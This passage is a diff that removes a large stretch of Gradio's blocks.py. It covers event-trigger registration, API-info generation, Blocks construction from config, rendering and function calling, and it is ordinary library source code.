- if isinstance(self, components.IOComponent):
- Context.root_block.temp_file_sets.append(self.temp_files)
- return self
-
- def unrender(self):
- """
- Removes self from BlockContext if it has been rendered (otherwise does nothing).
- Removes self from the layout and collection of blocks, but does not delete any event triggers.
- """
- if Context.block is not None:
- try:
- Context.block.children.remove(self)
- except ValueError:
- pass
- if Context.root_block is not None:
- try:
- del Context.root_block.blocks[self._id]
- except KeyError:
- pass
- return self
-
- def get_block_name(self) -> str:
- """
- Gets block's class name.
-
- If it is template component it gets the parent's class name.
-
- @return: class name
- """
- return (
- self.__class__.__base__.__name__.lower()
- if hasattr(self, "is_template")
- else self.__class__.__name__.lower()
- )
-
- def get_expected_parent(self) -> type[BlockContext] | None:
- return None
-
- def set_event_trigger(
- self,
- event_name: str,
- fn: Callable | None,
- inputs: Component | list[Component] | set[Component] | None,
- outputs: Component | list[Component] | None,
- preprocess: bool = True,
- postprocess: bool = True,
- scroll_to_output: bool = False,
- show_progress: str = "full",
- api_name: str | None | Literal[False] = None,
- js: str | None = None,
- no_target: bool = False,
- queue: bool | None = None,
- batch: bool = False,
- max_batch_size: int = 4,
- cancels: list[int] | None = None,
- every: float | None = None,
- collects_event_data: bool | None = None,
- trigger_after: int | None = None,
- trigger_only_on_success: bool = False,
- ) -> tuple[dict[str, Any], int]:
- """
- Adds an event to the component's dependencies.
- Parameters:
- event_name: event name
- fn: Callable function
- inputs: input list
- outputs: output list
- preprocess: whether to run the preprocess methods of components
- postprocess: whether to run the postprocess methods of components
- scroll_to_output: whether to scroll to output of dependency on trigger
- show_progress: whether to show progress animation while running.
- api_name: defines how the endpoint appears in the API docs. Can be a string, None, or False. If False, the endpoint will not be exposed in the api docs. If set to None, the endpoint will be exposed in the api docs as an unnamed endpoint, although this behavior will be changed in Gradio 4.0. If set to a string, the endpoint will be exposed in the api docs with the given name.
- js: Experimental parameter (API may change): Optional frontend js method to run before running 'fn'. Input arguments for js method are values of 'inputs' and 'outputs', return should be a list of values for output components
- no_target: if True, sets "targets" to [], used for Blocks "load" event
- queue: If True, will place the request on the queue, if the queue has been enabled. If False, will not put this event on the queue, even if the queue has been enabled. If None, will use the queue setting of the gradio app.
- batch: whether this function takes in a batch of inputs
- max_batch_size: the maximum batch size to send to the function
- cancels: a list of other events to cancel when this event is triggered. For example, setting cancels=[click_event] will cancel the click_event, where click_event is the return value of another components .click method.
- every: Run this event 'every' number of seconds while the client connection is open. Interpreted in seconds. Queue must be enabled.
- collects_event_data: whether to collect event data for this event
- trigger_after: if set, this event will be triggered after 'trigger_after' function index
- trigger_only_on_success: if True, this event will only be triggered if the previous event was successful (only applies if `trigger_after` is set)
- Returns: dependency information, dependency index
- """
- # Support for singular parameter
- if isinstance(inputs, set):
- inputs_as_dict = True
- inputs = sorted(inputs, key=lambda x: x._id)
- else:
- inputs_as_dict = False
- if inputs is None:
- inputs = []
- elif not isinstance(inputs, list):
- inputs = [inputs]
-
- if isinstance(outputs, set):
- outputs = sorted(outputs, key=lambda x: x._id)
- else:
- if outputs is None:
- outputs = []
- elif not isinstance(outputs, list):
- outputs = [outputs]
-
- if fn is not None and not cancels:
- check_function_inputs_match(fn, inputs, inputs_as_dict)
-
- if Context.root_block is None:
- raise AttributeError(
- f"{event_name}() and other events can only be called within a Blocks context."
- )
- if every is not None and every <= 0:
- raise ValueError("Parameter every must be positive or None")
- if every and batch:
- raise ValueError(
- f"Cannot run {event_name} event in a batch and every {every} seconds. "
- "Either batch is True or every is non-zero but not both."
- )
-
- if every and fn:
- fn = get_continuous_fn(fn, every)
- elif every:
- raise ValueError("Cannot set a value for `every` without a `fn`.")
-
- _, progress_index, event_data_index = (
- special_args(fn) if fn else (None, None, None)
- )
- Context.root_block.fns.append(
- BlockFunction(
- fn,
- inputs,
- outputs,
- preprocess,
- postprocess,
- inputs_as_dict,
- progress_index is not None,
- )
- )
- if api_name is not None and api_name is not False:
- api_name_ = utils.append_unique_suffix(
- api_name, [dep["api_name"] for dep in Context.root_block.dependencies]
- )
- if api_name != api_name_:
- warnings.warn(f"api_name {api_name} already exists, using {api_name_}")
- api_name = api_name_
-
- if collects_event_data is None:
- collects_event_data = event_data_index is not None
-
- dependency = {
- "targets": [self._id] if not no_target else [],
- "trigger": event_name,
- "inputs": [block._id for block in inputs],
- "outputs": [block._id for block in outputs],
- "backend_fn": fn is not None,
- "js": js,
- "queue": False if fn is None else queue,
- "api_name": api_name,
- "scroll_to_output": False if utils.get_space() else scroll_to_output,
- "show_progress": show_progress,
- "every": every,
- "batch": batch,
- "max_batch_size": max_batch_size,
- "cancels": cancels or [],
- "types": {
- "continuous": bool(every),
- "generator": inspect.isgeneratorfunction(fn) or bool(every),
- },
- "collects_event_data": collects_event_data,
- "trigger_after": trigger_after,
- "trigger_only_on_success": trigger_only_on_success,
- }
- Context.root_block.dependencies.append(dependency)
- return dependency, len(Context.root_block.dependencies) - 1
-
- def get_config(self):
- return {
- "visible": self.visible,
- "elem_id": self.elem_id,
- "elem_classes": self.elem_classes,
- "root_url": self.root_url,
- }
-
- @staticmethod
- @abstractmethod
- def update(**kwargs) -> dict:
- return {}
-
- @classmethod
- def get_specific_update(cls, generic_update: dict[str, Any]) -> dict:
- generic_update = generic_update.copy()
- del generic_update["__type__"]
- specific_update = cls.update(**generic_update)
- return specific_update
-
-
-class BlockContext(Block):
- def __init__(
- self,
- visible: bool = True,
- render: bool = True,
- **kwargs,
- ):
- """
- Parameters:
- visible: If False, this will be hidden but included in the Blocks config file (its visibility can later be updated).
- render: If False, this will not be included in the Blocks config file at all.
- """
- self.children: list[Block] = []
- Block.__init__(self, visible=visible, render=render, **kwargs)
-
- def add_child(self, child: Block):
- self.children.append(child)
-
- def __enter__(self):
- self.parent = Context.block
- Context.block = self
- return self
-
- def add(self, child: Block):
- child.parent = self
- self.children.append(child)
-
- def fill_expected_parents(self):
- children = []
- pseudo_parent = None
- for child in self.children:
- expected_parent = child.get_expected_parent()
- if not expected_parent or isinstance(self, expected_parent):
- pseudo_parent = None
- children.append(child)
- else:
- if pseudo_parent is not None and isinstance(
- pseudo_parent, expected_parent
- ):
- pseudo_parent.add_child(child)
- else:
- pseudo_parent = expected_parent(render=False)
- pseudo_parent.parent = self
- children.append(pseudo_parent)
- pseudo_parent.add_child(child)
- if Context.root_block:
- Context.root_block.blocks[pseudo_parent._id] = pseudo_parent
- child.parent = pseudo_parent
- self.children = children
-
- def __exit__(self, *args):
- if getattr(self, "allow_expected_parents", True):
- self.fill_expected_parents()
- Context.block = self.parent
-
- def postprocess(self, y):
- """
- Any postprocessing needed to be performed on a block context.
- """
- return y
-
-
-class BlockFunction:
- def __init__(
- self,
- fn: Callable | None,
- inputs: list[Component],
- outputs: list[Component],
- preprocess: bool,
- postprocess: bool,
- inputs_as_dict: bool,
- tracks_progress: bool = False,
- ):
- self.fn = fn
- self.inputs = inputs
- self.outputs = outputs
- self.preprocess = preprocess
- self.postprocess = postprocess
- self.tracks_progress = tracks_progress
- self.total_runtime = 0
- self.total_runs = 0
- self.inputs_as_dict = inputs_as_dict
- self.name = getattr(fn, "__name__", "fn") if fn is not None else None
- self.spaces_auto_wrap()
-
- def spaces_auto_wrap(self):
- if spaces is None:
- return
- if utils.get_space() is None:
- return
- self.fn = spaces.gradio_auto_wrap(self.fn)
-
- def __str__(self):
- return str(
- {
- "fn": self.name,
- "preprocess": self.preprocess,
- "postprocess": self.postprocess,
- }
- )
-
- def __repr__(self):
- return str(self)
-
-
-class class_or_instancemethod(classmethod): # noqa: N801
- def __get__(self, instance, type_):
- descr_get = super().__get__ if instance is None else self.__func__.__get__
- return descr_get(instance, type_)
-
-
-def postprocess_update_dict(block: Block, update_dict: dict, postprocess: bool = True):
- """
- Converts a dictionary of updates into a format that can be sent to the frontend.
- E.g. {"__type__": "generic_update", "value": "2", "interactive": False}
- Into -> {"__type__": "update", "value": 2.0, "mode": "static"}
-
- Parameters:
- block: The Block that is being updated with this update dictionary.
- update_dict: The original update dictionary
- postprocess: Whether to postprocess the "value" key of the update dictionary.
- """
- if update_dict.get("__type__", "") == "generic_update":
- update_dict = block.get_specific_update(update_dict)
- if update_dict.get("value") is components._Keywords.NO_VALUE:
- update_dict.pop("value")
- interactive = update_dict.pop("interactive", None)
- if interactive is not None:
- update_dict["mode"] = "dynamic" if interactive else "static"
- prediction_value = delete_none(update_dict, skip_value=True)
- if "value" in prediction_value and postprocess:
- assert isinstance(
- block, components.IOComponent
- ), f"Component {block.__class__} does not support value"
- prediction_value["value"] = block.postprocess(prediction_value["value"])
- return prediction_value
-
-
-def convert_component_dict_to_list(
- outputs_ids: list[int], predictions: dict
-) -> list | dict:
- """
- Converts a dictionary of component updates into a list of updates in the order of
- the outputs_ids and including every output component. Leaves other types of dictionaries unchanged.
- E.g. {"textbox": "hello", "number": {"__type__": "generic_update", "value": "2"}}
- Into -> ["hello", {"__type__": "generic_update"}, {"__type__": "generic_update", "value": "2"}]
- """
- keys_are_blocks = [isinstance(key, Block) for key in predictions]
- if all(keys_are_blocks):
- reordered_predictions = [skip() for _ in outputs_ids]
- for component, value in predictions.items():
- if component._id not in outputs_ids:
- raise ValueError(
- f"Returned component {component} not specified as output of function."
- )
- output_index = outputs_ids.index(component._id)
- reordered_predictions[output_index] = value
- predictions = utils.resolve_singleton(reordered_predictions)
- elif any(keys_are_blocks):
- raise ValueError(
- "Returned dictionary included some keys as Components. Either all keys must be Components to assign Component values, or return a List of values to assign output values in order."
- )
- return predictions
-
-
-def get_api_info(config: dict, serialize: bool = True):
- """
- Gets the information needed to generate the API docs from a Blocks config.
- Parameters:
- config: a Blocks config dictionary
- serialize: If True, returns the serialized version of the typed information. If False, returns the raw version.
- """
- api_info = {"named_endpoints": {}, "unnamed_endpoints": {}}
- mode = config.get("mode", None)
- after_new_format = version.parse(config.get("version", "2.0")) > version.Version(
- "3.28.3"
- )
-
- for d, dependency in enumerate(config["dependencies"]):
- dependency_info = {"parameters": [], "returns": []}
- skip_endpoint = False
-
- inputs = dependency["inputs"]
- for i in inputs:
- for component in config["components"]:
- if component["id"] == i:
- break
- else:
- skip_endpoint = True # if component not found, skip endpoint
- break
- type = component["type"]
- if type in client_utils.SKIP_COMPONENTS:
- continue
- if (
- not component.get("serializer")
- and type not in serializing.COMPONENT_MAPPING
- ):
- skip_endpoint = True # if component not serializable, skip endpoint
- break
- if type in client_utils.SKIP_COMPONENTS:
- continue
- label = component["props"].get("label", f"parameter_{i}")
- # The config has the most specific API info (taking into account the parameters
- # of the component), so we use that if it exists. Otherwise, we fallback to the
- # Serializer's API info.
- serializer = serializing.COMPONENT_MAPPING[type]()
- if component.get("api_info") and after_new_format:
- info = component["api_info"]
- example = component["example_inputs"]["serialized"]
- else:
- assert isinstance(serializer, serializing.Serializable)
- info = serializer.api_info()
- example = serializer.example_inputs()["raw"]
- python_info = info["info"]
- if serialize and info["serialized_info"]:
- python_info = serializer.serialized_info()
- if (
- isinstance(serializer, serializing.FileSerializable)
- and component["props"].get("file_count", "single") != "single"
- ):
- python_info = serializer._multiple_file_serialized_info()
-
- python_type = client_utils.json_schema_to_python_type(python_info)
- serializer_name = serializing.COMPONENT_MAPPING[type].__name__
- dependency_info["parameters"].append(
- {
- "label": label,
- "type": info["info"],
- "python_type": {
- "type": python_type,
- "description": python_info.get("description", ""),
- },
- "component": type.capitalize(),
- "example_input": example,
- "serializer": serializer_name,
- }
- )
-
- outputs = dependency["outputs"]
- for o in outputs:
- for component in config["components"]:
- if component["id"] == o:
- break
- else:
- skip_endpoint = True # if component not found, skip endpoint
- break
- type = component["type"]
- if type in client_utils.SKIP_COMPONENTS:
- continue
- if (
- not component.get("serializer")
- and type not in serializing.COMPONENT_MAPPING
- ):
- skip_endpoint = True # if component not serializable, skip endpoint
- break
- label = component["props"].get("label", f"value_{o}")
- serializer = serializing.COMPONENT_MAPPING[type]()
- if component.get("api_info") and after_new_format:
- info = component["api_info"]
- example = component["example_inputs"]["serialized"]
- else:
- assert isinstance(serializer, serializing.Serializable)
- info = serializer.api_info()
- example = serializer.example_inputs()["raw"]
- python_info = info["info"]
- if serialize and info["serialized_info"]:
- python_info = serializer.serialized_info()
- if (
- isinstance(serializer, serializing.FileSerializable)
- and component["props"].get("file_count", "single") != "single"
- ):
- python_info = serializer._multiple_file_serialized_info()
- python_type = client_utils.json_schema_to_python_type(python_info)
- serializer_name = serializing.COMPONENT_MAPPING[type].__name__
- dependency_info["returns"].append(
- {
- "label": label,
- "type": info["info"],
- "python_type": {
- "type": python_type,
- "description": python_info.get("description", ""),
- },
- "component": type.capitalize(),
- "serializer": serializer_name,
- }
- )
-
- if not dependency["backend_fn"]:
- skip_endpoint = True
-
- if skip_endpoint:
- continue
- if dependency["api_name"] is not None and dependency["api_name"] is not False:
- api_info["named_endpoints"][f"/{dependency['api_name']}"] = dependency_info
- elif (
- dependency["api_name"] is False
- or mode == "interface"
- or mode == "tabbed_interface"
- ):
- pass # Skip unnamed endpoints in interface mode
- else:
- api_info["unnamed_endpoints"][str(d)] = dependency_info
-
- return api_info
-
-
-@document("launch", "queue", "integrate", "load")
-class Blocks(BlockContext):
- """
- Blocks is Gradio's low-level API that allows you to create more custom web
- applications and demos than Interfaces (yet still entirely in Python).
-
-
- Compared to the Interface class, Blocks offers more flexibility and control over:
- (1) the layout of components (2) the events that
- trigger the execution of functions (3) data flows (e.g. inputs can trigger outputs,
- which can trigger the next level of outputs). Blocks also offers ways to group
- together related demos such as with tabs.
-
-
- The basic usage of Blocks is as follows: create a Blocks object, then use it as a
- context (with the "with" statement), and then define layouts, components, or events
- within the Blocks context. Finally, call the launch() method to launch the demo.
-
- Example:
- import gradio as gr
- def update(name):
- return f"Welcome to Gradio, {name}!"
-
- with gr.Blocks() as demo:
- gr.Markdown("Start typing below and then click **Run** to see the output.")
- with gr.Row():
- inp = gr.Textbox(placeholder="What is your name?")
- out = gr.Textbox()
- btn = gr.Button("Run")
- btn.click(fn=update, inputs=inp, outputs=out)
-
- demo.launch()
- Demos: blocks_hello, blocks_flipper, blocks_speech_text_sentiment, generate_english_german, sound_alert
- Guides: blocks-and-event-listeners, controlling-layout, state-in-blocks, custom-CSS-and-JS, custom-interpretations-with-blocks, using-blocks-like-functions
- """
-
- def __init__(
- self,
- theme: Theme | str | None = None,
- analytics_enabled: bool | None = None,
- mode: str = "blocks",
- title: str = "Gradio",
- css: str | None = None,
- **kwargs,
- ):
- """
- Parameters:
- theme: a Theme object or a string representing a theme. If a string, will look for a built-in theme with that name (e.g. "soft" or "default"), or will attempt to load a theme from the HF Hub (e.g. "gradio/monochrome"). If None, will use the Default theme.
- analytics_enabled: whether to allow basic telemetry. If None, will use GRADIO_ANALYTICS_ENABLED environment variable or default to True.
- mode: a human-friendly name for the kind of Blocks or Interface being created.
- title: The tab title to display when this is opened in a browser window.
- css: custom css or path to custom css file to apply to entire Blocks
- """
- self.limiter = None
- if theme is None:
- theme = DefaultTheme()
- elif isinstance(theme, str):
- if theme.lower() in BUILT_IN_THEMES:
- theme = BUILT_IN_THEMES[theme.lower()]
- else:
- try:
- theme = Theme.from_hub(theme)
- except Exception as e:
- warnings.warn(f"Cannot load {theme}. Caught Exception: {str(e)}")
- theme = DefaultTheme()
- if not isinstance(theme, Theme):
- warnings.warn("Theme should be a class loaded from gradio.themes")
- theme = DefaultTheme()
- self.theme: Theme = theme
- self.theme_css = theme._get_theme_css()
- self.stylesheets = theme._stylesheets
- self.encrypt = False
- self.share = False
- self.enable_queue = None
- self.max_threads = 40
- self.show_error = True
- if css is not None and os.path.exists(css):
- with open(css) as css_file:
- self.css = css_file.read()
- else:
- self.css = css
-
- # For analytics_enabled and allow_flagging: (1) first check for
- # parameter, (2) check for env variable, (3) default to True/"manual"
- self.analytics_enabled = (
- analytics_enabled
- if analytics_enabled is not None
- else analytics.analytics_enabled()
- )
- if self.analytics_enabled:
- t = threading.Thread(target=analytics.version_check)
- t.start()
- else:
- os.environ["HF_HUB_DISABLE_TELEMETRY"] = "True"
- super().__init__(render=False, **kwargs)
- self.blocks: dict[int, Block] = {}
- self.fns: list[BlockFunction] = []
- self.dependencies = []
- self.mode = mode
-
- self.is_running = False
- self.local_url = None
- self.share_url = None
- self.width = None
- self.height = None
- self.api_open = True
-
- self.space_id = utils.get_space()
- self.favicon_path = None
- self.auth = None
- self.dev_mode = True
- self.app_id = random.getrandbits(64)
- self.temp_file_sets = []
- self.title = title
- self.show_api = True
-
- # Only used when an Interface is loaded from a config
- self.predict = None
- self.input_components = None
- self.output_components = None
- self.__name__ = None
- self.api_mode = None
- self.progress_tracking = None
- self.ssl_verify = True
-
- self.allowed_paths = []
- self.blocked_paths = []
- self.root_path = ""
- self.root_urls = set()
-
- if not wasm_utils.IS_WASM and self.analytics_enabled:
- is_custom_theme = not any(
- self.theme.to_dict() == built_in_theme.to_dict()
- for built_in_theme in BUILT_IN_THEMES.values()
- )
- data = {
- "mode": self.mode,
- "custom_css": self.css is not None,
- "theme": self.theme.name,
- "is_custom_theme": is_custom_theme,
- "version": GRADIO_VERSION,
- }
- analytics.initiated_analytics(data)
-
- @classmethod
- def from_config(
- cls,
- config: dict,
- fns: list[Callable],
- root_url: str,
- ) -> Blocks:
- """
- Factory method that creates a Blocks from a config and list of functions. Used
- internally by the gradio.external.load() method.
-
- Parameters:
- config: a dictionary containing the configuration of the Blocks.
- fns: a list of functions that are used in the Blocks. Must be in the same order as the dependencies in the config.
- root_url: an external url to use as a root URL when serving files for components in the Blocks.
- """
- config = copy.deepcopy(config)
- components_config = config["components"]
- for component_config in components_config:
- # for backwards compatibility, extract style into props
- if "style" in component_config["props"]:
- component_config["props"].update(component_config["props"]["style"])
- del component_config["props"]["style"]
- theme = config.get("theme", "default")
- original_mapping: dict[int, Block] = {}
- root_urls = {root_url}
-
- def get_block_instance(id: int) -> Block:
- for block_config in components_config:
- if block_config["id"] == id:
- break
- else:
- raise ValueError(f"Cannot find block with id {id}")
- cls = component_or_layout_class(block_config["type"])
- block_config["props"].pop("type", None)
- block_config["props"].pop("name", None)
- # If a Gradio app B is loaded into a Gradio app A, and B itself loads a
- # Gradio app C, then the root_urls of the components in A need to be the
- # URL of C, not B. The else clause below handles this case.
- if block_config["props"].get("root_url") is None:
- block_config["props"]["root_url"] = f"{root_url}/"
- else:
- root_urls.add(block_config["props"]["root_url"])
- # Any component has already processed its initial value, so we skip that step here
- block = cls(**block_config["props"], _skip_init_processing=True)
- return block
-
- def iterate_over_children(children_list):
- for child_config in children_list:
- id = child_config["id"]
- block = get_block_instance(id)
-
- original_mapping[id] = block
-
- children = child_config.get("children")
- if children is not None:
- assert isinstance(
- block, BlockContext
- ), f"Invalid config, Block with id {id} has children but is not a BlockContext."
- with block:
- iterate_over_children(children)
-
- derived_fields = ["types"]
-
- with Blocks(theme=theme) as blocks:
- # ID 0 should be the root Blocks component
- original_mapping[0] = Context.root_block or blocks
-
- iterate_over_children(config["layout"]["children"])
-
- first_dependency = None
-
- # add the event triggers
- for dependency, fn in zip(config["dependencies"], fns):
- # We used to add a "fake_event" to the config to cache examples
- # without removing it. This was causing bugs in calling gr.load
- # We fixed the issue by removing "fake_event" from the config in examples.py
- # but we still need to skip these events when loading the config to support
- # older demos
- if dependency["trigger"] == "fake_event":
- continue
- for field in derived_fields:
- dependency.pop(field, None)
- targets = dependency.pop("targets")
- trigger = dependency.pop("trigger")
- dependency.pop("backend_fn")
- dependency.pop("documentation", None)
- dependency["inputs"] = [
- original_mapping[i] for i in dependency["inputs"]
- ]
- dependency["outputs"] = [
- original_mapping[o] for o in dependency["outputs"]
- ]
- dependency.pop("status_tracker", None)
- dependency["preprocess"] = False
- dependency["postprocess"] = False
-
- for target in targets:
- dependency = original_mapping[target].set_event_trigger(
- event_name=trigger, fn=fn, **dependency
- )[0]
- if first_dependency is None:
- first_dependency = dependency
-
- # Allows some use of Interface-specific methods with loaded Spaces
- if first_dependency and Context.root_block:
- blocks.predict = [fns[0]]
- blocks.input_components = [
- Context.root_block.blocks[i] for i in first_dependency["inputs"]
- ]
- blocks.output_components = [
- Context.root_block.blocks[o] for o in first_dependency["outputs"]
- ]
- blocks.__name__ = "Interface"
- blocks.api_mode = True
-
- blocks.root_urls = root_urls
- return blocks
-
- def __str__(self):
- return self.__repr__()
-
- def __repr__(self):
- num_backend_fns = len([d for d in self.dependencies if d["backend_fn"]])
- repr = f"Gradio Blocks instance: {num_backend_fns} backend functions"
- repr += f"\n{'-' * len(repr)}"
- for d, dependency in enumerate(self.dependencies):
- if dependency["backend_fn"]:
- repr += f"\nfn_index={d}"
- repr += "\n inputs:"
- for input_id in dependency["inputs"]:
- block = self.blocks[input_id]
- repr += f"\n |-{block}"
- repr += "\n outputs:"
- for output_id in dependency["outputs"]:
- block = self.blocks[output_id]
- repr += f"\n |-{block}"
- return repr
-
- def render(self):
- if Context.root_block is not None:
- if self._id in Context.root_block.blocks:
- raise DuplicateBlockError(
- f"A block with id: {self._id} has already been rendered in the current Blocks."
- )
- overlapping_ids = set(Context.root_block.blocks).intersection(self.blocks)
- for id in overlapping_ids:
- # State components are allowed to be reused between Blocks
- if not isinstance(self.blocks[id], components.State):
- raise DuplicateBlockError(
- "At least one block in this Blocks has already been rendered."
- )
-
- Context.root_block.blocks.update(self.blocks)
- Context.root_block.fns.extend(self.fns)
- dependency_offset = len(Context.root_block.dependencies)
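-            # Dependency and fn indices are re-based against the root Blocks so
-            # that "cancels" and "trigger_after" keep pointing at the right entries.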
- for i, dependency in enumerate(self.dependencies):
- api_name = dependency["api_name"]
- if api_name is not None and api_name is not False:
- api_name_ = utils.append_unique_suffix(
- api_name,
- [dep["api_name"] for dep in Context.root_block.dependencies],
- )
- if api_name != api_name_:
- warnings.warn(
- f"api_name {api_name} already exists, using {api_name_}"
- )
- dependency["api_name"] = api_name_
- dependency["cancels"] = [
- c + dependency_offset for c in dependency["cancels"]
- ]
- if dependency.get("trigger_after") is not None:
- dependency["trigger_after"] += dependency_offset
- # Recreate the cancel function so that it has the latest
- # dependency fn indices. This is necessary to properly cancel
- # events in the backend
- if dependency["cancels"]:
- updated_cancels = [
- Context.root_block.dependencies[i]
- for i in dependency["cancels"]
- ]
- new_fn = BlockFunction(
- get_cancel_function(updated_cancels)[0],
- [],
- [],
- False,
- True,
- False,
- )
- Context.root_block.fns[dependency_offset + i] = new_fn
- Context.root_block.dependencies.append(dependency)
- Context.root_block.temp_file_sets.extend(self.temp_file_sets)
- Context.root_block.root_urls.update(self.root_urls)
-
- if Context.block is not None:
- Context.block.children.extend(self.children)
- return self
-
- def is_callable(self, fn_index: int = 0) -> bool:
- """Checks if a particular Blocks function is callable (i.e. not stateful or a generator)."""
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- if inspect.isasyncgenfunction(block_fn.fn):
- return False
- if inspect.isgeneratorfunction(block_fn.fn):
- return False
- for input_id in dependency["inputs"]:
- block = self.blocks[input_id]
- if getattr(block, "stateful", False):
- return False
- for output_id in dependency["outputs"]:
- block = self.blocks[output_id]
- if getattr(block, "stateful", False):
- return False
-
- return True
-
- def __call__(self, *inputs, fn_index: int = 0, api_name: str | None = None):
- """
- Allows Blocks objects to be called as functions. Supply the parameters to the
- function as positional arguments. To choose which function to call, use the
- fn_index parameter, which must be a keyword argument.
-
- Parameters:
- *inputs: the parameters to pass to the function
- fn_index: the index of the function to call (defaults to 0, which for Interfaces, is the default prediction function)
- api_name: The api_name of the dependency to call. Will take precedence over fn_index.
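-        Example:
-            # Illustrative sketch; `greet`, `inp`, and `out` are made-up names.
-            import gradio as gr
-            def greet(name):
-                return "Hello " + name
-            with gr.Blocks() as demo:
-                inp = gr.Textbox()
-                out = gr.Textbox()
-                inp.change(greet, inp, out)
-            demo("World", fn_index=0)  # returns "Hello World"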
- """
- if api_name is not None:
- inferred_fn_index = next(
- (
- i
- for i, d in enumerate(self.dependencies)
- if d.get("api_name") == api_name
- ),
- None,
- )
- if inferred_fn_index is None:
- raise InvalidApiNameError(
- f"Cannot find a function with api_name {api_name}"
- )
- fn_index = inferred_fn_index
- if not (self.is_callable(fn_index)):
- raise ValueError(
- "This function is not callable because it is either stateful or is a generator. Please use the .launch() method instead to create an interactive user interface."
- )
-
- inputs = list(inputs)
- processed_inputs = self.serialize_data(fn_index, inputs)
- batch = self.dependencies[fn_index]["batch"]
- if batch:
- processed_inputs = [[inp] for inp in processed_inputs]
-
- outputs = client_utils.synchronize_async(
- self.process_api,
- fn_index=fn_index,
- inputs=processed_inputs,
- request=None,
- state={},
- )
- outputs = outputs["data"]
-
- if batch:
- outputs = [out[0] for out in outputs]
-
- processed_outputs = self.deserialize_data(fn_index, outputs)
- processed_outputs = utils.resolve_singleton(processed_outputs)
-
- return processed_outputs
-
- async def call_function(
- self,
- fn_index: int,
- processed_input: list[Any],
- iterator: AsyncIterator[Any] | None = None,
- requests: routes.Request | list[routes.Request] | None = None,
- event_id: str | None = None,
- event_data: EventData | None = None,
- ):
- """
- Calls function with given index and preprocessed input, and measures process time.
- Parameters:
- fn_index: index of function to call
- processed_input: preprocessed input to pass to function
- iterator: iterator to use if function is a generator
- requests: requests to pass to function
- event_id: id of event in queue
- event_data: data associated with event trigger
- """
- block_fn = self.fns[fn_index]
- assert block_fn.fn, f"function with index {fn_index} not defined."
- is_generating = False
-
- if block_fn.inputs_as_dict:
- processed_input = [dict(zip(block_fn.inputs, processed_input))]
-
- request = requests[0] if isinstance(requests, list) else requests
- processed_input, progress_index, _ = special_args(
- block_fn.fn, processed_input, request, event_data
- )
- progress_tracker = (
- processed_input[progress_index] if progress_index is not None else None
- )
-
- start = time.time()
-
- fn = utils.get_function_with_locals(block_fn.fn, self, event_id)
-
- if iterator is None: # If not a generator function that has already run
- if progress_tracker is not None and progress_index is not None:
- progress_tracker, fn = create_tracker(
- self, event_id, fn, progress_tracker.track_tqdm
- )
- processed_input[progress_index] = progress_tracker
-
- if inspect.iscoroutinefunction(fn):
- prediction = await fn(*processed_input)
- else:
- prediction = await anyio.to_thread.run_sync(
- fn, *processed_input, limiter=self.limiter
- )
- else:
- prediction = None
-
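-        # Generator (streaming) functions are advanced one step per call: the
-        # iterator is created on the first invocation and resumed afterwards
-        # until StopAsyncIteration marks it as finished.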
- if inspect.isgeneratorfunction(fn) or inspect.isasyncgenfunction(fn):
- if not self.enable_queue:
- raise ValueError("Need to enable queue to use generators.")
- try:
- if iterator is None:
- iterator = cast(AsyncIterator[Any], prediction)
- if inspect.isgenerator(iterator):
- iterator = utils.SyncToAsyncIterator(iterator, self.limiter)
- prediction = await utils.async_iteration(iterator)
- is_generating = True
- except StopAsyncIteration:
- n_outputs = len(self.dependencies[fn_index].get("outputs"))
- prediction = (
- components._Keywords.FINISHED_ITERATING
- if n_outputs == 1
- else (components._Keywords.FINISHED_ITERATING,) * n_outputs
- )
- iterator = None
-
- duration = time.time() - start
-
- return {
- "prediction": prediction,
- "duration": duration,
- "is_generating": is_generating,
- "iterator": iterator,
- }
-
- def serialize_data(self, fn_index: int, inputs: list[Any]) -> list[Any]:
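-        # Convert raw Python values into the serialized payloads each input
-        # IOComponent expects over the API.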
- dependency = self.dependencies[fn_index]
- processed_input = []
-
- for i, input_id in enumerate(dependency["inputs"]):
- try:
- block = self.blocks[input_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Input component with id {input_id} used in {dependency['trigger']}() event is not defined in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.IOComponent
- ), f"{block.__class__} Component with id {input_id} not a valid input component."
- serialized_input = block.serialize(inputs[i])
- processed_input.append(serialized_input)
-
- return processed_input
-
- def deserialize_data(self, fn_index: int, outputs: list[Any]) -> list[Any]:
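-        # Inverse of serialize_data: turn API payloads back into Python values,
-        # saving any referenced files under the component's temp directory.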
- dependency = self.dependencies[fn_index]
- predictions = []
-
- for o, output_id in enumerate(dependency["outputs"]):
- try:
- block = self.blocks[output_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Output component with id {output_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.IOComponent
- ), f"{block.__class__} Component with id {output_id} not a valid output component."
- deserialized = block.deserialize(
- outputs[o],
- save_dir=block.DEFAULT_TEMP_DIR,
- root_url=block.root_url,
- hf_token=Context.hf_token,
- )
- predictions.append(deserialized)
-
- return predictions
-
- def validate_inputs(self, fn_index: int, inputs: list[Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- dep_inputs = dependency["inputs"]
-
- # This handles incorrect inputs when args are changed by a JS function
- # Only check not enough args case, ignore extra arguments (for now)
- # TODO: make this stricter?
- if len(inputs) < len(dep_inputs):
- name = (
- f" ({block_fn.name})"
- if block_fn.name and block_fn.name != ""
- else ""
- )
-
- wanted_args = []
- received_args = []
- for input_id in dep_inputs:
- block = self.blocks[input_id]
- wanted_args.append(str(block))
- for inp in inputs:
- v = f'"{inp}"' if isinstance(inp, str) else str(inp)
- received_args.append(v)
-
- wanted = ", ".join(wanted_args)
- received = ", ".join(received_args)
-
- # JS func didn't pass enough arguments
- raise ValueError(
- f"""An event handler{name} didn't receive enough input values (needed: {len(dep_inputs)}, got: {len(inputs)}).
-Check if the event handler calls a Javascript function, and make sure its return value is correct.
-Wanted inputs:
- [{wanted}]
-Received inputs:
- [{received}]"""
- )
-
- def preprocess_data(self, fn_index: int, inputs: list[Any], state: dict[int, Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- self.validate_inputs(fn_index, inputs)
-
- if block_fn.preprocess:
- processed_input = []
- for i, input_id in enumerate(dependency["inputs"]):
- try:
